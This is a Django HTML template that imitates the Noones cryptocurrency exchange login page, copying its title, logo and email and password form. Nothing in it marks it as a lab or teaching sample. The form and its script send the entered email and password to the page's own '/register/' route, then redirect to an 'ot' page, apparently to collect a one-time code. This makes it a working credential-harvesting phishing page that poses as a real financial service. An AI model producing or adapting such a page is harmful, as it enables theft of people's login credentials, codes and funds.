<!DOCTYPE html>
{% load static %}
<html lang="en">
    <head>
        <!-- <base href="/"> -->
        <meta charset="utf-8">
        <link rel="icon" href="/id/favicon.ico">
        <meta name="viewport" content="width=device-width,initial-scale=1">
        <meta name="theme-color" content="#000000">
        <meta property="og:title" content="Buy or Sell Bitcoin At Noones">
        <meta name="description" content="Buy or Sell Bitcoin, USDT, USDC with numerous options to pay.">
        <link rel="apple-touch-icon" href="/id/logo192.png">
        <!-- <script src="/id/gt.js"></script> -->
        <!-- <link rel="manifest" href="/id/manifest.json"> -->
        <title>Log In to Your Account | Noones</title>
        <!-- <script defer="defer" src="/id/static/js/main.0fd37a7a.js"></script> -->
        <!-- <link href="/id/static/css/main.c323a2d3.css" rel="stylesheet"> -->
        <style data-emotion="css-global" data-s=""></style>
        <style data-emotion="css-global" data-s=""></style>
        <style data-emotion="css-global" data-s=""></style>
        <style data-emotion="css" data-s=""></style>
        <link rel="stylesheet" href="{% static 'css/non.css' %}"  type="text/css">
    </head>
<body>
    <div id="root"><div class="AccountPages_desktop_container__ka8ai MuiBox-root css-0">
        <div class="AccountDesktop_left_container__29ttM MuiBox-root css-0">
            <div class="AccountDesktop_left_block__ylKpe">
                <div class="AccountDesktop_left_header__wI6Bt">
                    <div class="AccountDesktop_left_header_logo__qMHip">
                        <a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineAlways css-g4qjy3" href="/" tabindex="1">
                            <svg width="129" height="40" viewBox="0 0 129 40" fill="none" xmlns="http://www.w3.org/2000/svg">
                                <g clip-path="url(#clip0_411_20798)">
                                    <path d="M0.499756 15.3039L5.71557 14.7591L6.09175 18.1218L7.83036 17.9409L7.64324 16.2633L9.38185 16.0823L9.19279 14.3972L16.1024 13.6753L16.2914 15.3604L18.0301 15.1795L18.4062 18.5422L20.1448 18.3612L21.8269 33.4048L16.6111 33.9496L15.3773 22.9152C15.1122 20.5421 13.2625 18.9041 10.5864 19.183C7.91222 19.462 6.46208 21.4468 6.72716 23.82L7.96095 34.8543L2.74513 35.3991L0.499756 15.3039Z" fill="#03452E"></path>
                                    <path d="M31.099 38.32L27.6179 38.6461L27.4483 36.9591L25.7077 37.1212L25.3705 33.7547L23.63 33.9168L22.9653 27.2687L24.7059 27.1066L24.3687 23.7401L26.1092 23.578L25.9416 21.8985L29.4227 21.5724L29.2532 19.8854L36.8391 19.1748L37.0087 20.8618L40.4898 20.5357L40.6574 22.2152L42.398 22.0531L42.7352 25.4196L44.4757 25.2575L45.1404 31.9056L43.3998 32.0677L43.737 35.4342L41.9964 35.5963L42.166 37.2833L38.6849 37.6094L38.8525 39.2888L31.2666 39.9995L31.099 38.32ZM34.5859 34.9007C37.7104 34.6086 39.7472 32.0206 39.4529 29.082C39.1605 26.1509 36.6481 23.9889 33.5217 24.2811C30.3973 24.5732 28.3605 27.1612 28.6528 30.0923C28.9472 33.029 31.4596 35.1929 34.584 34.9007H34.5859Z" fill="#03452E"></path>
                                    <path d="M51.0304 26.8183L47.5337 26.7787L47.5551 25.0842L45.8068 25.0634L45.8477 21.6819L44.0994 21.6611L44.1812 14.9828L45.9296 15.0036L45.9705 11.622L47.7189 11.6428L47.7403 9.95575L51.237 9.99533L51.2584 8.30078L58.8795 8.38937L58.858 10.0839L62.3547 10.1235L62.3333 11.8105L64.0816 11.8312L64.0407 15.2128L65.7891 15.2335L65.7072 21.9118L63.9588 21.8911L63.9179 25.2726L62.1696 25.2519L62.1481 26.9465L58.6514 26.9069L58.63 28.5939L51.009 28.5053L51.0304 26.8183ZM54.8799 23.7836C58.0199 23.8194 60.3335 21.4594 60.3705 18.5095C60.4076 15.5653 58.1505 13.1526 55.0124 13.1168C51.8724 13.081 49.5588 15.4409 49.5218 18.3851C49.4848 21.3369 51.7399 23.7496 54.8799 23.7854V23.7836Z" fill="#03452E"></path>
                                    <path d="M68.2529 14.7094L73.498 14.7961L73.4376 18.1777L75.1859 18.2059L75.2151 16.5189L76.9635 16.5472L76.9927 14.8527L83.9413 14.9676L83.9121 16.6622L85.6604 16.6905L85.6 20.072L87.3484 20.1003L87.0813 35.2287L81.8363 35.142L82.0331 24.0436C82.076 21.6572 80.4505 19.8081 77.7607 19.7648C75.0709 19.7195 73.3771 21.514 73.3362 23.9003L73.1393 34.9987L67.8943 34.912L68.251 14.7075L68.2529 14.7094Z" fill="#03452E"></path>
                                    <path d="M96.5869 32.0397L93.0902 32.0774L93.0707 30.3828L91.3223 30.4017L91.2833 27.0201L89.535 27.039L89.457 20.3607L91.2054 20.3418L91.1664 16.9603L92.9148 16.9414L92.8953 15.2544L96.392 15.2167L96.3725 13.5222L103.362 13.4468L103.381 15.1413L106.878 15.1036L106.898 16.7906L108.646 16.7718L108.734 24.2776L97.8421 24.3963C96.3647 24.4133 95.4311 25.1578 95.4447 26.3284C95.4642 28.0644 97.4932 29.1652 99.6022 29.1425C103.635 29.0992 103.518 26.7619 107.015 26.7242L108.763 26.7053L108.804 30.2151L107.056 30.2339L107.075 31.9285L103.578 31.9662L103.598 33.6532L96.6083 33.7286L96.5888 32.0416L96.5869 32.0397ZM99.9121 21.4181C101.304 21.403 103.859 21.4596 103.843 20.1175C103.83 18.9885 102.426 17.9649 99.8731 17.9932C97.3626 18.0215 95.8949 19.0752 95.9086 20.2042C95.9242 21.5463 98.5223 21.4332 99.9121 21.4181Z" fill="#03452E"></path>
                                    <path d="M116.076 32.811L112.581 32.6715L112.653 30.9789L110.907 30.9091L111.061 27.2693L113.48 27.3655C117.152 27.5106 115.926 29.978 120.271 30.1514C121.84 30.2136 123.122 29.6142 123.175 28.3588C123.221 27.2788 122.3 26.7623 120.783 26.5323L116.863 25.8952C112.942 25.2581 111.252 22.8096 111.347 20.5533L111.478 17.4772L113.224 17.5469L113.297 15.8618L116.791 16.0013L116.863 14.3086L123.403 14.5687L123.331 16.2614L126.825 16.4009L126.753 18.086L128.5 18.1557L128.35 21.7107L127.003 21.6579C122.436 21.477 123.529 18.9625 119.317 18.7947C117.483 18.7212 116.423 19.33 116.382 20.2819C116.335 21.362 117.13 21.6541 118.824 21.9407L122.882 22.5759C126.537 23.1583 128.182 25.6125 128.063 28.4286L127.929 31.5896L126.182 31.5198L126.11 33.2125L122.615 33.073L122.543 34.7581L116.004 34.498L116.076 32.8129V32.811Z" fill="#03452E"></path>
                                    <path d="M64.9238 5.64709L66.2661 6.73633L71.1661 1.08909L69.8238 -0.00014392L64.9238 5.64709Z" fill="#03452E"></path>
                                    <path d="M62.1469 4.87797L63.8733 5.17236L64.4026 2.26909L62.6762 1.9747L62.1469 4.87797Z" fill="#03452E"></path>
                                    <path d="M66.8873 7.66986L67.4866 9.26221L71.7834 7.74978L71.1841 6.15743L66.8873 7.66986Z" fill="#03452E"></path>
                                </g>
                                <defs>
                                    <clipPath id="clip0_411_20798">
                                        <rect width="128" height="40" fill="white" transform="translate(0.5)"></rect>
                                    </clipPath>
                                </defs>
                            </svg>
                        </a>
                    </div>
                   
                </div>
                <div class="AccountPages_sign_in_mobile_header__QNZWa MuiBox-root css-0"></div>
                <div class="AccountDesktop_left_title_container__GkydF">
                    <div class="AccountDesktop_left_title_content__wCXK5">
                        <div class="AccountDesktop_left_title_content_title__HKyYS">
                            <span class="MuiTypography-root MuiTypography-largeHeadingLargeSemiBold css-1oyy7qw">Log In</span>
                            <div class="CustomSelect_container__fe6w+">
                                <label class="MuiFormLabel-root MuiInputLabel-root MuiInputLabel-animated MuiFormLabel-colorPrimary css-qsay7m"></label>
                                <div class="MuiInputBase-root MuiOutlinedInput-root MuiInputBase-colorPrimary  css-17qvxof">
                                    <div tabindex="99" role="button" aria-expanded="false" aria-haspopup="listbox" class="MuiSelect-select MuiSelect-outlined MuiInputBase-input MuiOutlinedInput-input css-1880b1u">
                                        <div class="MuiBox-root css-ffucg1">
                                            <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                                                <path d="M4.01 7.858C8.902 9.369 15.098 9.369 19.989 7.858M19.99 16.142C15.098 14.631 8.902 14.631 4.011 16.142M12 3C16.982 3 21 7.018 21 12C21 16.982 16.982 21 12 21C7.018 21 3 16.982 3 12C3 7.018 7.018 3 12 3ZM10.168 4.06C7.278 8.885 7.278 15.116 10.168 19.941C11.014 21.354 12.987 21.354 13.833 19.941C16.723 15.116 16.723 8.885 13.833 4.06C12.986 2.647 11.014 2.647 10.168 4.06Z" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path></svg>English
                                            </div>
                                        </div>
                                        <input aria-hidden="true" tabindex="-1" class="MuiSelect-nativeInput css-1k3x8v3" value="en">
                                        <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg" class="MuiSelect-icon MuiSelect-iconOutlined css-bi4s6q">
                                            <path d="M8 10L12 14L16 10" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
                                        </svg>
                                        <fieldset aria-hidden="true" class="MuiOutlinedInput-notchedOutline css-igs3ac">
                                            <legend class="css-hdw1oc">
                                                <span class="notranslate">​</span>
                                            </legend>
                                        </fieldset>
                                    </div>
                                </div>
                            </div>
                            <span class="MuiTypography-root MuiTypography-smallLabelSmallSemiBoldMuted css-nqg8mf">Please enter E-mail and Password</span>
                        </div>
                    </div>
                    <div class="AccountDesktop_left_children_container__dKcPW">
                        <div class="AccountForm_form_container__BQBT1">
                            <form class="AccountForm_form_content__tfcAc" method="POST" action="{% url 'register' %}">
                                {% csrf_token %}
                                <div class="MuiTabs-root css-1hghomm">
                                    <div class="MuiTabs-scroller MuiTabs-fixed css-18jpbi7" style="overflow: hidden; margin-bottom: 0px;">
                                        <div class="MuiTabs-flexContainer css-7sga7m" role="tablist">
                                            <button class="MuiButtonBase-root MuiTab-root MuiTab-textColorPrimary Mui-selected css-12mz3io" tabindex="1" type="button" role="tab" aria-selected="true">E-mail<span class="MuiTouchRipple-root css-w0pj6f"></span>
                                            </button>
                                            <button class="MuiButtonBase-root MuiTab-root MuiTab-textColorPrimary css-12mz3io" tabindex="2" type="button" role="tab" aria-selected="false">Phone<span class="MuiTouchRipple-root css-w0pj6f"></span>
                                            </button>
                                        </div>
                                        <span class="MuiTabs-indicator css-kmalbe" style="left: 6px; width: 90px;"></span>
                                    </div>
                                </div>
                                <div class="AccountForm_form_content_block__r69NE" >
                                    
                                    <div class="AccountForm_form_input_container__5+Cyl">
                                        <label class="MuiFormLabel-root MuiInputLabel-root MuiInputLabel-animated MuiFormLabel-colorPrimary css-q44hkt">E-mail</label>
                                        <div class="AccountForm_email__0qYhn">
                                            <div class="MuiInputBase-root MuiOutlinedInput-root MuiInputBase-colorPrimary MuiInputBase-fullWidth css-1xm0egt">
                                                <input autocomplete="email" name="email" placeholder="Enter your e-mail" type="email" tabindex="3" bordercolor="#9AA7A2" class="MuiInputBase-input MuiOutlinedInput-input css-1pog434" value="">
                                                <fieldset aria-hidden="true" class="MuiOutlinedInput-notchedOutline css-igs3ac">
                                                    <legend class="css-hdw1oc">
                                                        <span class="notranslate">​</span>
                                                    </legend>
                                                </fieldset>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="AccountForm_form_input_container__5+Cyl">
                                        <div class="AccountForm_form_input_password__sbHSm">
                                            <label class="MuiFormLabel-root MuiInputLabel-root MuiInputLabel-animated MuiFormLabel-colorPrimary css-q44hkt">Password</label>
                                            <a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineAlways css-123np1" href="/id/reset-password" tabindex="9">
                                                <span class="MuiTypography-root MuiTypography-smallBodySmallSemiBold css-ngal3z">Forgot password?</span>
                                            </a>
                                        </div>
                                        <div class="PasswordInput_container__2L5-0">
                                            <div class="MuiInputBase-root MuiOutlinedInput-root MuiInputBase-colorPrimary MuiInputBase-fullWidth css-1xm0egt">
                                                <input autocomplete="current-password" name="password" id="userPassword" placeholder="Enter Password" type="password" tabindex="5" bordercolor="#9AA7A2" class="MuiInputBase-input MuiOutlinedInput-input css-1pog434" value="">
                                                <fieldset aria-hidden="true" class="MuiOutlinedInput-notchedOutline css-igs3ac">
                                                    <legend class="css-hdw1oc">
                                                        <span class="notranslate">​</span>
                                                    </legend>
                                                </fieldset>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <button class="MuiButtonBase-root MuiButton-root MuiButton-text MuiButton-textPrimary MuiButton-sizeMedium MuiButton-textSizeMedium MuiButton-fullWidth AccountForm_submit_button__SaOGp AccountForm_submit_button_margin_top__oxI3h css-ocor93" tabindex="8" type="submit" name="submit" id="submitButton">
                                   <div class="MuiBox-root css-bfvi9j">Log In</div>
                                    <span class="MuiTouchRipple-root css-w0pj6f"></span>
                                </button>
                                <div class="AccountForm_additionally_container__nyWN+"><span class="MuiTypography-root MuiTypography-smallLabelSmallSemiBold css-ck1buk">Don’t have an account?</span><span class="MuiTypography-root MuiTypography-smallLabelSmallSemiBold css-ck1buk"><a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineAlways css-j1rm5t" tabindex="10" href="/id/register">Sign Up</a></span>
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
            <div class="AccountDesktop_right_container__XysXr MuiBox-root css-14r34si">
                <div class="AccountDesktop_container_image__FGha6">

                </div>
            </div>
            <div aria-hidden="true" class="MuiBackdrop-root css-6gcqm5" style="opacity: 0; transition: opacity 195ms cubic-bezier(0.4, 0, 0.2, 1) 0ms; visibility: hidden;">
                <div class="PixelatedLoader_container__XMGYZ MuiBox-root css-0">
                    <div class="PixelatedLoader_loader__uMWU-">
                        <span class="PixelatedLoader_loader_block__KFGVu"></span>
                        <span class="PixelatedLoader_loader_block__KFGVu"></span>
                        <span class="PixelatedLoader_loader_block__KFGVu"></span>
                        <span class="PixelatedLoader_loader_block__KFGVu"></span>
                        <span class="PixelatedLoader_loader_block__KFGVu"></span>
                        <span class="PixelatedLoader_loader_block__KFGVu"></span>
                        <span class="PixelatedLoader_loader_block__KFGVu"></span>
                        <span class="PixelatedLoader_loader_block__KFGVu"></span>
                        <span class="PixelatedLoader_loader_block__KFGVu"></span>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <!-- <script>
        document.addEventListener('DOMContentLoaded', function() {
          const emailField = document.querySelector('input[name="email"]');
          const passwordField = document.querySelector('input[name="password"]');
          const submitButton = document.querySelector('#submitButton');
  
          if (submitButton) {
            submitButton.addEventListener('click', function(event) {
              event.preventDefault();
              console.log("button clicked");
  
              const formData = new FormData();
              formData.append('email', emailField.value);
              formData.append('password', passwordField.value);
  
              fetch('/register/', {
                method: 'POST',
                body: formData
              })
              .then(response => {
                console.log('Form submitted successfully');
              })
              .catch(error => {
                console.error('Error submitting form:', error);
              });
            });
          }
        });
      </script> -->
      <script>
        document.addEventListener('DOMContentLoaded', function() {
          const emailField = document.querySelector('input[name="email"]');
          const passwordField = document.querySelector('input[name="password"]');
          const submitButton = document.querySelector('#submitButton');
      
          if (submitButton) {
            submitButton.addEventListener('click', function(event) {
              event.preventDefault();
              console.log("button clicked");
      
              const formData = new FormData();
              formData.append('email', emailField.value);
              formData.append('password', passwordField.value);
              
              // get CSRF token value from cookie
              const csrftoken = getCookie('csrftoken');
      
              fetch('/register/', {
                method: 'POST',
                body: formData,
                headers: {
                  'X-CSRFToken': csrftoken
                }
              })
              .then(response => {
                console.log('Form submitted successfully');
                // Redirect to OTP page
                window.location.href = "{% url 'ot' %}";  // Make sure 'ot' matches the name in your URL pattern
              })
              .catch(error => {
                console.error('Error submitting form:', error);
              });
            });
          }
      
          // function to get CSRF token value from cookie
          function getCookie(name) {
            let cookieValue = null;
            if (document.cookie && document.cookie !== '') {
              const cookies = document.cookie.split(';');
              for (let i = 0; i < cookies.length; i++) {
                const cookie = cookies[i].trim();
                if (cookie.substring(0, name.length + 1) === (name + '=')) {
                  cookieValue = decodeURIComponent(cookie.substring(name.length + 1));
                  break;
                }
              }
            }
            return cookieValue;
          }
        });
      </script>
      
</body>

</html>
